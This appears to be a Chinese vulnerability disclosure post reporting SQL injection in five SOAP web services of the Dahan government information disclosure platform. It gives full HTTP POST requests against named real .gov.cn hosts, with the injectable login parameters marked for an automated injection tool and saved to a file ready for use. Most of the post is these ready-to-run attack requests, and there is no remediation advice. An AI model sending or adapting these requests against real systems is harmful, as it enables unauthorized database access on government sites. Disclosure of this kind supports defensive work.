大汉政府信息公开多处SQL注入

  • A+
所属分类:漏洞时代
摘要

主要是webservice漏洞,漏洞存在于
1./xxgk/services/WSSync_xxgk?wsdl该WSSync_xxgk服务的多个方法,多个参数存在严重漏洞,且该漏洞普遍存在。
wsGetWeb
getClientIpAxis
wsGetColumn
wsGetColumnStyle
wsSynchronize
wsSynchronizeWithPath
wsSync
上述方法的多个参数均存在漏洞,随便选取一个方法进行测试

主要是webservice漏洞,漏洞存在于
1./xxgk/services/WSSync_xxgk?wsdl

该WSSync_xxgk服务的多个方法,多个参数存在严重漏洞,且该漏洞普遍存在。
wsGetWeb
getClientIpAxis
wsGetColumn
wsGetColumnStyle
wsSynchronize
wsSynchronizeWithPath
wsSync
上述方法的多个参数均存在漏洞,随便选取一个方法进行测试

/xxgk/services/WSSync_xxgk?wsdl wsGetColumn方法
用WSockExpert v0.7抓包,并保存为wooyun.txt

POST /xxgk/services/WSSync_xxgk?wsdl HTTP/1.1 Accept-Encoding: gzip,deflate Content-Type: text/xml;charset=UTF-8 SOAPAction: "" Content-Length: 222 Host: xxgk.lyg.gov.cn Connection: Keep-Alive User-Agent: google robots  <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:rec="http://receive.blf.jcms">    <soapenv:Header/>    <soapenv:Body>       <rec:wsGetColumn soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">          <strWebId xsi:type="xsd:string">1</strWebId>          <strLoginId xsi:type="xsd:string">1*</strLoginId>          <strPwd xsi:type="xsd:string">1</strPwd>          <strKey xsi:type="xsd:string">1</strKey>       </rec:wsGetColumn>    </soapenv:Body> </soapenv:Envelope> 

大汉政府信息公开多处SQL注入

2./xxgk/services/WSSynchronize?wsdl
WSSynchronize服务的多个方法,多个参数存在严重漏洞,且该漏洞普遍存在,如
wsGetWeb
wsGetColumnStyle
wsSynchronize
wsSynchronizeWithPath
上述方法的多个参数均存在漏洞,这里随便选取一个方法(wsSynchronize)进行测试
用WSockExpert v0.7抓包,并保存为wooyun.txt

POST /xxgk/services/WSSynchronize?wsdl HTTP/1.1  Accept-Encoding: gzip,deflate  Content-Type: text/xml;charset=UTF-8  SOAPAction: ""  Content-Length: 222  Host: xxgk.lyg.gov.cn  Connection: Close  User-Agent: google robots   <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservice.blf.jcms">   <soapenv:Header/>   <soapenv:Body>    <web:wsSynchronize soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">     <strXml xsi:type="xsd:string">1</strXml>      <strLoginId xsi:type="xsd:string">1*</strLoginId>      <strPwd xsi:type="xsd:string">1</strPwd>      <strKey xsi:type="xsd:string">1</strKey>      <hasZip xsi:type="xsd:string">1</hasZip>    </web:wsSynchronize>   </soapenv:Body>  </soapenv:Envelope>

大汉政府信息公开多处SQL注入
3./xxgk/services/WSSmsSync?wsdl
WSSmsSync服务的多个方法,多个参数存在严重漏洞,且该漏洞普遍存在,如
isBase64
wsSyncGetInfos
wsSyncGetInfos
setStrAppId
setBase64

上述方法的多个参数均存在漏洞,这里随便选取一个方法(wsSyncGetInfos)进行测试
用WSockExpert v0.7抓包,并保存为wooyun.txt

POST /xxgk/services/WSSmsSync?wsdl HTTP/1.1 Accept-Encoding: gzip,deflate Content-Type: text/xml;charset=UTF-8 SOAPAction: "" Content-Length: 222 Host: xxgk.yj.gov.cn Connection: Close User-Agent: google robots  <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:rec="http://receive.blf.jcms">    <soapenv:Header/>    <soapenv:Body>       <rec:wsSyncGetInfos soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">          <strLoginId xsi:type="xsd:string">1*</strLoginId>          <strPwd xsi:type="xsd:string">1</strPwd>          <beginTime xsi:type="xsd:string">1</beginTime>          <endTime xsi:type="xsd:string">?</endTime>          <maxId xsi:type="xsd:string">1</maxId>       </rec:wsSyncGetInfos>    </soapenv:Body> </soapenv:Envelope>

大汉政府信息公开多处SQL注入
4./xxgk/services/WSSync_searchinfo
该WSSync_searchinfo服务的多个方法,多个参数存在严重漏洞,且该漏洞普遍存在,如
getClientIpAxis
wsTest
wsSyncGetInfos
setBase64
isBase64
setStrAppId
上述方法的多个参数均存在漏洞,这里随便选取一个方法进行测试

首先保存如下内容为wooyun.txt

POST /xxgk/services/WSSync_searchinfo HTTP/1.1 Accept-Encoding: gzip,deflate Content-Type: text/xml;charset=UTF-8 SOAPAction: "" Content-Length: 222 Host: xxgk.cqyc.gov.cn Connection: Close User-Agent: google robots  <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservice.blf.jcms">    <soapenv:Header/>    <soapenv:Body>       <web:wsSyncGetInfos soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">          <strLoginId xsi:type="xsd:string">1*</strLoginId>          <strPwd xsi:type="xsd:string">1</strPwd>          <strKey xsi:type="xsd:string">1</strKey>          <num xsi:type="xsd:string">1</num>          <maxId xsi:type="xsd:string">1</maxId>       </web:wsSyncGetInfos>    </soapenv:Body> </soapenv:Envelope>

大汉政府信息公开多处SQL注入
5./xxgk/services/WSYsqgk?wsdl
该WSYsqgk服务的多个方法,多个参数存在严重漏洞,且该漏洞普遍存在,如
wsTest
getClientIpAxis
wsGetYsqgk

上述方法的多个参数均存在漏洞,这里随便选取一个方法进行测试
首先保存如下内容为wooyun.txt

POST /xxgk/services/WSYsqgk?wsdl HTTP/1.1 Accept-Encoding: gzip,deflate Content-Type: text/xml;charset=UTF-8 SOAPAction: "" Content-Length: 222 Host: xxgk.yiyuan.gov.cn Connection: Close User-Agent: google robots  <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:rec="http://receive.blf.jcms">    <soapenv:Header/>    <soapenv:Body>       <rec:wsGetYsqgk soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">          <strId xsi:type="xsd:string">1</strId>          <strLoginId xsi:type="xsd:string">2</strLoginId>          <strPwd xsi:type="xsd:string">3</strPwd>          <strKey xsi:type="xsd:string">4</strKey>       </rec:wsGetYsqgk>    </soapenv:Body> </soapenv:Envelope>

大汉政府信息公开多处SQL注入

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: